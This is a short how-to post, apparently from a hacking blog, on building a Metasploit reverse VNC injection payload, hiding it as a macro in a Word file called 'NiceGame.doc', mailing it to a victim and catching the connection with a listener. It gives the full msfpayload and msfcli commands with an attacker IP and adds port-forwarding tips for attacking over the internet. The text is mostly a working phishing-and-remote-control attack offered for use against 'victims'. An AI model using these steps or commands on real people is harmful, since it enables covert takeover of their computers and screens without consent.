Hello friends, today I'm going to show how to use Metasploit v3.2 payload feature for Reverse VNC Injection, The steps are given below,
1) Create a payload for ReverseVNCInjection with Metasploit's msfpayload utility,
./msfpayload windows/vncinject/reverse_tcp LHOST=172.16.107.44 V > exploit.bas
2) Copy exploit.bas file to another windows system to make .doc file,
Create New doc file --> write some text into it, then do the following ,
go to tools–>macro–>visualbasic editor.
then go to File–>import file–> and choose the exploit.bas and save it with a name ex: NiceGame.doc
Now file is ready, send this file to victim via mail or by some other ways,
3)Now in Backtrack-4, type this command
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=172.16.107.44 DisableCourtesyShell=True E
On target windows system, when victim open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the Backtack.
Note : There is no required of VNC installed in the Victim PC; you can also do this in WAN also, only thing is that you should port forward your 4444 port in modem or router.
Original Video links for the above guide,